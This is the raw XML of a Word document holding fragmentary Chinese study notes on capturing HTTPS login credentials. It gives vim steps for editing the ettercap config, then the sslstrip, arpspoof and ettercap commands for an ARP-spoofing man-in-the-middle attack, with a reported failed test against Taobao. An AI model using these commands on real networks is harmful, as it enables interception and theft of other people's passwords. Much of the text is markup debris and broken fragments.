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Https账号密码获取：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Vim 文本编辑器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="50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 打开文本的方式（vim + 文件名（li.txt），当文本不存在时，自动创建文本）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="50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** 关掉窗口的方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLine="500" w:firstLineChars="0"/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按一下Esc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLine="500" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="cyan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按下shift+“：”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLine="500" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="cyan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输入 q!，表示“不保存，退出”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 vim /etc/ettercap/etter.conf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按PgDn向下翻：直到出现 linux 字样：</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1188085" cy="320675"/>
            <wp:effectExtent l="0" t="0" r="635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258" t="22402" r="3299" b="19284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3206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829310"/>
            <wp:effectExtent l="0" t="0" r="635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Vim 编辑：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按一下i这个键，编辑文本(去掉了#)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738505"/>
            <wp:effectExtent l="0" t="0" r="3175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0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按一下Esc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按下shift+“：”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输入wq  ，表示“保存，退出”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设置完成。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用到新工具：Sslstrip —— 能够把Https的链接还原为为Http链接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sslstrip -a -f -k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欺骗 arpspoof -i eth0 -t 192.168.136.130 192.168.136.2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Ettercap -Tq -i eth0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这次是用淘宝网做的测试，之后显示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2324100" cy="166116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601980"/>
            <wp:effectExtent l="0" t="0" r="762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依然没有成功。当然我学的是方法，之后有的是试验的机会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注意：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在这里网站会出现证书错误的问题，不过影响不大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这个具有偶然性，索然大多数情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况下都是抓不到的，毕竟现在的网站都有了拖动浮块验证的的那一个条目。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EAFFE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="912EAF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442A55"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D5442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CA33E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1C7CA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1B1186E"/>
    <w:rsid w:val="13CD10E6"/>
    <w:rsid w:val="520014BA"/>
    <w:rsid w:val="78516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Office_11.1.0.8813_F1E327BC-269C-435d-A152-05C5408002CA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2019-07-22T09:46:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>柠檬不萌</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-23T13:38:08Z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